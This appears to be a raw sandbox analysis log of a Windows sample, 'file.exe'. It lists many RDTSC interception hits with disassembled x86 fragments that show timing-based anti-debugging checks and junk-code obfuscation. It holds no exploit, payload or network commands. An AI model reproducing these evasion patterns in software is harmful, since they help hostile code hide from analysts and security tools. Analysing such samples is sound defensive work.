Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD1EF second address: BFD1F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFE503 second address: BFE51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC153h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD1F4 second address: BFD1FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFEE52 second address: BFEEDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F34BEC151h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 sbb esi, 15047600h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F0F34BEC148h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 pushad 0x00000033 mov eax, ebx 0x00000035 pushad 0x00000036 mov dh, bh 0x00000038 or cl, FFFFFFFAh 0x0000003b popad 0x0000003c popad 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007F0F34BEC148h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 0000001Ah 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 mov dword ptr [ebp+122D22A9h], ecx 0x0000005f xchg eax, ebx 0x00000060 js 00007F0F34BEC154h 0x00000066 pushad 0x00000067 je 00007F0F34BEC146h 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0029D second address: C002A7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0F345319E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00CEB second address: C00D16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0F34BEC154h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e js 00007F0F34BEC158h 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F0F34BEC146h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00D16 second address: C00D76 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F345319E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jp 00007F0F345319EEh 0x00000011 pushad 0x00000012 or dword ptr [ebp+122D1F4Eh], edi 0x00000018 sbb ch, 00000007h 0x0000001b popad 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F0F345319E8h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 push esi 0x00000039 sbb si, 1841h 0x0000003e pop edi 0x0000003f push 00000000h 0x00000041 mov dword ptr [ebp+1247974Eh], edi 0x00000047 xchg eax, ebx 0x00000048 pushad 0x00000049 pushad 0x0000004a push esi 0x0000004b pop esi 0x0000004c jnc 00007F0F345319E6h 0x00000052 popad 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C04295 second address: C04299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C04299 second address: C042AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0F345319EBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C042AD second address: C042B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB042F second address: BB043F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB043F second address: BB044F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0F34BEC146h 0x0000000a ja 00007F0F34BEC146h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB044F second address: BB0453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB0453 second address: BB0472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F0F34BEC146h 0x00000010 jmp 00007F0F34BEC14Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB0472 second address: BB0476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0765D second address: C0769C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bx, F5EDh 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F0F34BEC148h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov bl, 71h 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C06770 second address: C0677F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C08772 second address: C08776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C08776 second address: C0877A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0877A second address: C087D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F0F34BEC148h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 jns 00007F0F34BEC148h 0x00000028 mov ebx, dword ptr [ebp+122D3C58h] 0x0000002e push 00000000h 0x00000030 clc 0x00000031 push 00000000h 0x00000033 mov bh, 5Ch 0x00000035 mov di, ax 0x00000038 xchg eax, esi 0x00000039 jmp 00007F0F34BEC14Fh 0x0000003e push eax 0x0000003f jo 00007F0F34BEC14Eh 0x00000045 push ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0971B second address: C0971F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0971F second address: C09729 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0A75C second address: C0A7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F0F345319E8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 sub ebx, dword ptr [ebp+122D2414h] 0x0000002b pop edi 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F0F345319E8h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 xchg eax, esi 0x00000049 js 00007F0F345319F0h 0x0000004f jmp 00007F0F345319EAh 0x00000054 push eax 0x00000055 jc 00007F0F345319F2h 0x0000005b jp 00007F0F345319ECh 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0C763 second address: C0C7EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC150h 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c js 00007F0F34BEC154h 0x00000012 pushad 0x00000013 jp 00007F0F34BEC146h 0x00000019 jo 00007F0F34BEC146h 0x0000001f popad 0x00000020 nop 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007F0F34BEC148h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000017h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b adc edi, 0EC0C071h 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push esi 0x00000046 call 00007F0F34BEC148h 0x0000004b pop esi 0x0000004c mov dword ptr [esp+04h], esi 0x00000050 add dword ptr [esp+04h], 00000019h 0x00000058 inc esi 0x00000059 push esi 0x0000005a ret 0x0000005b pop esi 0x0000005c ret 0x0000005d mov ebx, dword ptr [ebp+122D3CE0h] 0x00000063 push 00000000h 0x00000065 mov dword ptr [ebp+122D1F99h], esi 0x0000006b xchg eax, esi 0x0000006c js 00007F0F34BEC14Eh 0x00000072 push edi 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0B8D9 second address: C0B8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0C7EF second address: C0C7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0B8DE second address: C0B8E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0C7FB second address: C0C7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0B8E3 second address: C0B904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jmp 00007F0F345319F5h 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0C7FF second address: C0C80D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0D850 second address: C0D854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0CA5C second address: C0CA92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC158h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0F34BEC155h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0D854 second address: C0D85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0CA92 second address: C0CA96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0CA96 second address: C0CA9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C137FF second address: C13867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F34BEC150h 0x0000000b pushad 0x0000000c jmp 00007F0F34BEC14Eh 0x00000011 jmp 00007F0F34BEC158h 0x00000016 js 00007F0F34BEC146h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f popad 0x00000020 pushad 0x00000021 jmp 00007F0F34BEC158h 0x00000026 push eax 0x00000027 push edx 0x00000028 jl 00007F0F34BEC146h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB3984 second address: BB398A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13E2A second address: C13E30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0E9E3 second address: C0E9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13E30 second address: C13E75 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F0F34BEC148h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 movzx edi, dx 0x0000002c push 00000000h 0x0000002e sub ebx, dword ptr [ebp+122D3C40h] 0x00000034 push 00000000h 0x00000036 mov dword ptr [ebp+122D1E3Dh], esi 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13E75 second address: C13E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13E7C second address: C13E91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC151h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0DA78 second address: C0DA7E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C11A66 second address: C11A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C14DA3 second address: C14DDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F0F345319E6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F0F345319F8h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0F345319F1h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C140BA second address: C140CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C140CF second address: C140D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15E27 second address: C15E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15E2D second address: C15E8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add edi, dword ptr [ebp+1244C22Dh] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F0F345319E8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b sub bh, FFFFFF97h 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+12458D61h], esi 0x00000036 xchg eax, esi 0x00000037 jnp 00007F0F345319F9h 0x0000003d push eax 0x0000003e jp 00007F0F345319EEh 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C16013 second address: C16017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2A1B5 second address: C2A1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnc 00007F0F345319E6h 0x0000000c jmp 00007F0F345319EDh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2A1CF second address: C2A1D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2A1D5 second address: C2A1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2A1DB second address: C2A1DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2A1DF second address: C2A1E9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0F345319E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29506 second address: C2950C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2950C second address: C29512 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29512 second address: C29518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29518 second address: C2951C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2951C second address: C29530 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F0F34BEC146h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29530 second address: C29536 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29800 second address: C2980F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC14Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2980F second address: C2981D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C299B2 second address: C299CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC155h 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C299CF second address: C299D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C299D9 second address: C299E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F82E second address: C2F834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F834 second address: C2F84D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pushad 0x00000006 popad 0x00000007 jp 00007F0F34BEC146h 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F0F34BEC146h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F84D second address: C2F851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F851 second address: C2F861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F0F34BEC146h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F861 second address: C2F865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F865 second address: C2F86F instructions: 0x00000000 rdtsc 0x00000002 js 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F86F second address: C2F87B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F0F345319E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F87B second address: C2F87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2EB46 second address: C2EB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F0CD second address: C2F0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F0D1 second address: C2F0D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F227 second address: C2F234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF92EC second address: BF92F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF982B second address: BF982F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF982F second address: BF9833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9833 second address: BF9841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F0F34BEC146h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9841 second address: BF9845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9927 second address: BF9952 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007F0F34BEC146h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 5C458550h 0x00000015 cmc 0x00000016 push 9B17C2AEh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jns 00007F0F34BEC146h 0x00000024 jnl 00007F0F34BEC146h 0x0000002a popad 0x0000002b rdtsc
